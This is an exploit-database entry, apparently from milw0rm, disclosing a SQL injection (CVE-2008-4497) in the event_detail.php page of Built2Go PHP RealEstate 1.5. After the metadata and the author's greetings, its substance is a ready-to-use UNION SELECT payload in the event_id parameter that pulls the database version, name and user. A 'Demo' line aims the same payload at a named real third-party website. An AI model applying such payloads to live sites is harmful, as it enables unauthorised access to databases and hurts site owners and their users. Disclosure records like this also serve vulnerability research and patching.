Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection

Author: d3v1l
type: webapps
platform: php
port: 
date_added: 2008-10-06  
date_updated: 2016-12-26  
verified: 1  
codes: OSVDB-48952;CVE-2008-4497  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6697.txt  
[~]-----------------------------------------------------------------------------
[~] Built2Go PHP RealEstate v1.5 (event_detail.php) - SQL Injection Vulnerability
[~]
[~] [A professional real estate listings website.
[~] Lists homes for sale and apartments for rent,
[~] and provides a powerful search similar to the professional realtor websites.
[~] Allow visitors to list for free, or enforce free or paid registrations.]
[~] Price :- $69.95
[~] http://www.hotscripts.com/Detailed/59295.html
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 07.10.2008
[~]
[~]
[~] d3v1l@spoofer.com  http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/event_detail.php?event_id=-1 UNION SELECT
1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
[~]
[~] Demo :-
[~]
[~] http://www.agrents.com/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
[~]
[~]--------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-10-07]